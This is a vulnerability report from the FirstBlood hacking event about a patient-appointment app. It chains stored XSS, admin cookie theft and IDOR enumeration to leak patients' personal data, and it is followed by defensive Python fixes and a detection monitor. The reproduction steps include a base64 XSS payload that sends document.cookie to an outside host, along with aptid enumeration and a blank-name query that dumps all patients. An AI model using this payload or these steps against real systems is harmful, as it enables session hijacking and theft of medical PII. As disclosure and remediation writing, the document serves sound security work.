FirstBlood #83: Leaking PII data of users who have appointments using stored XSS and IDOR



On 2021-05-10, xnl-h4ck3r reported:

Summary

A stored XSS vulnerability exists in the manage appointments API /api/ma.php. An attacker can make an appointment, and then subsequently cancel it, but add the message parameter with an XSS payload that will fire on the admin cancellation page /drpanel/cancelled.php. This can leak the admin's drps cookie value. This cookie can then be used to make an authorised GET request to /drpanel/drapi/query.php passing the aptid parameter in the query string. An IDOR exists on this parameter that allows an attacker to enumerate the ID and therefore leak personal information for each user that has an appointment. On endpoint /drpanel/drapi/query.php the value of aptid takes the format 5691??19 where ?? is an even number starting at 02, 04, 06, etc. for each appointment booked. This endpoint will then reveal the Name, Address, Telephone and DOB of the user. User data of ALL patients can also be leaked using the leaked cookie value in a POST request to /drpanel/drapi/qp.php and a post parameter of name=%20

Steps to Reproduce

  1. Book an appointment on /book-appointment.html and make a note of the Appointment ID that is given, e.g. 58450974-9db1-4a05-90be-a01bf0179c80
  2. Go to /yourappointments.php, enter your Appointment ID and click Retrieve Appointment
  3. Run traffic through Burp proxy
  4. Click the CANCEL APPOINTMENT button.
  5. Go to the last POST to /api/ma.php in Burp history and send it to Repeater.
  6. NOTE: ALTHOUGH THE APPOINTMENT HAS BEEN CANCELLED, YOU CAN STILL USE THE APPOINTMENT ID IN THE API
  7. Now add the following post parameter: message="%3e%3cscript/src="data:;base64,dmFyIHg9bmV3IFhNTEh0dHBSZXF1ZXN0KCk7eC5vcGVuKCdHRVQnLCcvL3huMS51ay9jPScgKyBkb2N1bWVudC5jb29raWUpO3guc2VuZCgpOw=="%3e%3c/script/x%3e This is a Base64 encoding of var x=new XMLHttpRequest();x.open('GET','//xn1.uk/c=' + document.cookie);x.send();
  8. Send the request
  9. Now log in as an administrator and visit endpoint /drpanel/cancelled.php
  10. Observe the XSS payload firing and sending the value of the admin's cookie to my server:

  11. Make a GET request to /drpanel/drapi/query.php?aptid=5691???? where ???? is enumerated by adding 137 to the previous value each time.
  12. Observe the user data returned for each appointment:

  13. Make a POST request to /drpanel/drapi/qp.php using the admin's cookie, and providing a post parameter of name=%20
  14. Observe the response containing PII data of ALL patients:

Impact

The impact of this vulnerability is that an attacker could steal the admin's drps cookie, then enumerate the aptid to leak the personal data of users with appointments, or make a query to see ALL patients' PII.

P2 High


FirstBlood ID: 8
Vulnerability Type: Stored XSS

When cancelling an appointment, an attacker can add a malicious XSS payload that will execute against administrators/doctors.
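The report chains three weaknesses: the cancellation message is printed unencoded on the admin page, the session cookie is readable from script, and the staff API answers any aptid (and a blank name search) without further checks. The following Python sketch is an added example written for this page, not code from the FirstBlood application (which is PHP) or from the reporter; the record store, the `drps` cookie attributes, the `role`/`appointment_uuid` session fields and the `EnumerationMonitor` threshold are all assumptions, and the sample appointments are constructed. It shows the defensive side of each link in the chain: output encoding at the render point, an HttpOnly session cookie, an object-level authorization check on aptid, a minimum-length guard on the name search, and a simple detection for one session walking the aptid space.

```python
import html
from collections import defaultdict
from typing import Optional

# Constructed sample records, not data from the FirstBlood target. The aptid keys only
# copy the "5691??19" shape the report describes; the UUIDs and names are made up.
APPOINTMENTS = {
    "56910219": {"owner": "58450974-9db1-4a05-90be-a01bf0179c80", "name": "Pat Example",
                 "dob": "1984-03-02", "cancel_message": "Can't make it, sorry"},
    "56910419": {"owner": "c0ffee00-0000-4000-8000-000000000001", "name": "Sam Sample",
                 "dob": "1991-11-30",
                 "cancel_message": '"><script src="data:;base64,AAAA"></script>'},
}


def render_cancel_message(message: str) -> str:
    """Fix for the stored XSS: encode the message for an HTML body context at the
    point where the admin cancellation page prints it."""
    return "<td>" + html.escape(message, quote=True) + "</td>"


def session_cookie_header(value: str) -> str:
    """Set-Cookie for the staff session (attribute choice is an assumption).
    HttpOnly keeps the value out of document.cookie, so a script that still managed
    to run could not read it; Secure and SameSite narrow where the browser sends it."""
    return f"drps={value}; Path=/; HttpOnly; Secure; SameSite=Lax"


def query_appointment(session: dict, aptid: str) -> Optional[dict]:
    """Object-level authorization on aptid: staff may read any appointment, a
    patient only the one whose booking UUID their session holds. Unknown ids and
    other users' ids both return None so the response does not reveal which ids exist."""
    record = APPOINTMENTS.get(aptid)
    if record is None:
        return None
    is_staff = session.get("role") == "staff"
    is_owner = session.get("appointment_uuid") == record["owner"]
    if is_staff or is_owner:
        return {"name": record["name"], "dob": record["dob"]}
    return None


def search_patients(session: dict, name: str, min_len: int = 3) -> list:
    """Guard for the name search: require a staff session and a real search term, so
    a blank or whitespace-only value no longer matches every patient."""
    term = name.strip().lower()
    if session.get("role") != "staff" or len(term) < min_len:
        return []
    return [r["name"] for r in APPOINTMENTS.values() if term in r["name"].lower()]


class EnumerationMonitor:
    """Detection: count distinct aptid lookups per session. A session walking the
    id space in fixed steps, as a stolen admin cookie would, crosses the threshold
    while a doctor opening a handful of records does not."""

    def __init__(self, threshold: int = 10):
        self.threshold = threshold
        self.seen = defaultdict(set)

    def record(self, session_id: str, aptid: str) -> bool:
        """Return True once the session has looked up `threshold` distinct ids."""
        self.seen[session_id].add(aptid)
        return len(self.seen[session_id]) >= self.threshold


if __name__ == "__main__":
    staff = {"role": "staff"}
    print(render_cancel_message(APPOINTMENTS["56910419"]["cancel_message"]))
    print(query_appointment(staff, "56910219"))
    mon = EnumerationMonitor(threshold=3)
    for aptid in ["56910219", "56910419", "56910619"]:
        print(aptid, mon.record("stolen-cookie", aptid))
```

The authorization check and the HttpOnly flag are the two changes that break the chain outright: the first means a leaked cookie is still bounded by what that account may see, the second means the injected script never gets the cookie value to send. The monitor is a cheap signal for the enumeration step the report describes, where ids are walked at a fixed stride; in a real deployment the threshold and window would be tuned against normal staff usage.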


Respect Earnt: 2000000
RESPECT ($RSP) is an experimental cryptocurrency based on the Ethereum blockchain with the mission to show respect to those who deserve it. We are testing it out on our FirstBlood hackevent.